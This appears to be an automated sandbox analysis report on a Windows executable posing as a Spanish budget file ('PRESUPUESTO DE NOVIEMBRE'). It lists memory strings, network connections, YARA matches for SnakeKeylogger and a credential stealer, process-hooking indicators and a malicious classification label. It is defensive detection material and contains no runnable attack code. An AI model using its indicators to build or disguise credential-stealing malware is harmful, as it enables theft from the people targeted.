Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.000000000319A000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.77$
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000032EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000032E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB_q

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49877 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 1388, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 7336, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_01504204	2_2_01504204
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_0150E134	2_2_0150E134
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_01507018	2_2_01507018
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_07810E28	2_2_07810E28
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_07817AF1	2_2_07817AF1
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_0781A713	2_2_0781A713
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_0781A758	2_2_0781A758
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_0781C660	2_2_0781C660
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_0781C670	2_2_0781C670
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_0781C238	2_2_0781C238
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_078130D0	2_2_078130D0
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_07813F88	2_2_07813F88
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_0781CF48	2_2_0781CF48
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_07813F77	2_2_07813F77
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_07810E21	2_2_07810E21
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_07813CEB	2_2_07813CEB
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_07813CF0	2_2_07813CF0
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 2_2_0781AB90	2_2_0781AB90
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_03005380	5_2_03005380
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300D288	5_2_0300D288
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_03007118	5_2_03007118
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300C148	5_2_0300C148
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300C748	5_2_0300C748
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300C478	5_2_0300C478
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300CA18	5_2_0300CA18
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300E988	5_2_0300E988
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_030069B0	5_2_030069B0
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300CFB8	5_2_0300CFB8
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_03009DE0	5_2_03009DE0
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300CCE8	5_2_0300CCE8
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_03005362	5_2_03005362
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300D278	5_2_0300D278
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300C738	5_2_0300C738
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300C468	5_2_0300C468
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300CA08	5_2_0300CA08
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_03003AA1	5_2_03003AA1
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300F961	5_2_0300F961
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300F970	5_2_0300F970
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300E97B	5_2_0300E97B
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_030029EC	5_2_030029EC
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_030039EF	5_2_030039EF
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300CFA9	5_2_0300CFA9
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_03003E18	5_2_03003E18
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_0300CCD8	5_2_0300CCD8
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C19548	5_2_05C19548
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1FC68	5_2_05C1FC68
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C19C18	5_2_05C19C18
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C15028	5_2_05C15028
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1DDFF	5_2_05C1DDFF
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1D545	5_2_05C1D545
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1D550	5_2_05C1D550
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1CC8F	5_2_05C1CC8F
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1CCA0	5_2_05C1CCA0
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1178F	5_2_05C1178F
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C117A0	5_2_05C117A0
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C14FA3	5_2_05C14FA3
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1EF51	5_2_05C1EF51
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1EF60	5_2_05C1EF60
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C11E80	5_2_05C11E80
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1E6A0	5_2_05C1E6A0
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1E6B0	5_2_05C1E6B0
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C11E70	5_2_05C11E70
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1DE00	5_2_05C1DE00
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1D999	5_2_05C1D999
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1D9A8	5_2_05C1D9A8
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1295A	5_2_05C1295A
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C12968	5_2_05C12968
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1D0F8	5_2_05C1D0F8
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C10040	5_2_05C10040
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1F801	5_2_05C1F801
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C10007	5_2_05C10007
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1F810	5_2_05C1F810
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C15018	5_2_05C15018
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C18B91	5_2_05C18B91
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C18BA0	5_2_05C18BA0
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1F3A8	5_2_05C1F3A8
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1F3B8	5_2_05C1F3B8
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1EB08	5_2_05C1EB08
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C10B20	5_2_05C10B20
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C10B30	5_2_05C10B30
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1E249	5_2_05C1E249
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 5_2_05C1E258	5_2_05C1E258

Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000000.1290231489.0000000000C6A000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenameagpG.exe: vs PRESUPUESTO DE NOVIEMBRE...exe
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs PRESUPUESTO DE NOVIEMBRE...exe
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs PRESUPUESTO DE NOVIEMBRE...exe
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1313850390.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs PRESUPUESTO DE NOVIEMBRE...exe
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1312841202.000000000125E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PRESUPUESTO DE NOVIEMBRE...exe
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1318757187.000000000BA20000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs PRESUPUESTO DE NOVIEMBRE...exe
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs PRESUPUESTO DE NOVIEMBRE...exe
Source: PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3748024506.00000000012F7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PRESUPUESTO DE NOVIEMBRE...exe
Source: PRESUPUESTO DE NOVIEMBRE...exe	Binary or memory string: OriginalFilenameagpG.exe: vs PRESUPUESTO DE NOVIEMBRE...exe

Source: PRESUPUESTO DE NOVIEMBRE...exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 1388, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 7336, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: PRESUPUESTO DE NOVIEMBRE...exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, .cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, .cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, -.cs

Base64 encoded string: 'Xz5uie5TI+VAXJi5s+jK5JOMMKuvu0k+fP51uwEy6JFuAQXVFI2evOQ79rnb+BR6'

Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, v5FPWYwF5Lu3OYj8hh.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	Security API names: _0020.SetAccessControl
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	Security API names: _0020.AddAccessRule
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, v5FPWYwF5Lu3OYj8hh.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	Security API names: _0020.SetAccessControl
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	Security API names: _0020.AddAccessRule
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, v5FPWYwF5Lu3OYj8hh.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	Security API names: _0020.SetAccessControl
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, hG1k6rSWR9qjxqoKi3.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@4/3

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PRESUPUESTO DE NOVIEMBRE...exe.log

Jump to behavior

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe

Mutant created: NULL

